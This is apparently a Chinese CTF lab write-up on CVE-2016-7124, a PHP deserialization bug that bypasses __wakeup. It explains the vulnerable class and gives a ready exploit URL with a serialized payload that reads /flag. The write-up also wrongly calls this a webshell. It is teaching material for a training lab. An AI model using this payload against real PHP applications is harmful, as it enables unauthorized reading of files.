春秋云境CVE-2016-7124

1.阅读靶场信息

这里我们可以得到的信息就是序列化

沿着这个方向我们开启靶场吧

2.开启靶场

靶场如上图所示

代码功能分析

  1. 第一行highlight_file("/var/www/html/index.php") - 显示当前文件的源代码

  2. xiaorang类

    • 有一个公共属性 $file

    • __destruct():对象销毁时执行,读取并输出 $file 指定的文件

    • __wakeup():反序列化时自动执行,将 $file 强制设为 /var/www/html/index.php

  3. 最后部分

    • 检查GET参数 file 是否存在

    • 如果存在,直接对 file 参数值进行反序列化

3.poc利用

这里博主用的url就是

https://eci-2ze12sufspgrpapt2i5d.cloudeci1.ichunqiu.com:80/?file=O:8:%22xiaorang%22:2:{s:4:%22file%22;s:5:%22/flag%22;}

各位彦祖们可以参考参考

到这里相信各位彦祖们已经成功webshell了

希望大家喜欢,感谢你的观看

相关推荐
还是做不到嘛\.6 小时前
Dvwa靶场-SQL Injection (Blind)-基于sqlmap
数据库·sql·web安全
One_Blanks6 小时前
WIndows x64 ShellCode开发 第三章 x64汇编细节点
汇编·windows·网络安全·渗透测试·红队技术
菩提小狗7 小时前
每日安全情报报告 · 2026-03-31
网络安全·漏洞·cve·安全情报·每日安全
One_Blanks7 小时前
WIndows ShellCode开发 第四章 动态API调用
windows·网络安全·渗透测试
智算菩萨9 小时前
【论文精读】通过元学习与关联规则挖掘增强人工智能在网络安全领域特征选择中的可解释性
论文阅读·人工智能·学习·web安全·论文笔记
vortex511 小时前
HackMyVM: Flute 靶机渗透题解
网络安全
一名优秀的码农11 小时前
vulhub系列-48-Hack_Me_Please(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
vortex511 小时前
vmware虚拟机设置启动时进入live cd
linux·网络安全
One_Blanks12 小时前
WIndows x64 ShellCode开发 第五章 反向Shell编写
windows·网络安全·渗透测试
一只鼠标猴12 小时前
甲方应急响应:从事件处置到溯源闭环实战指南
安全·web安全·网络安全·应急响应·应急·应急溯源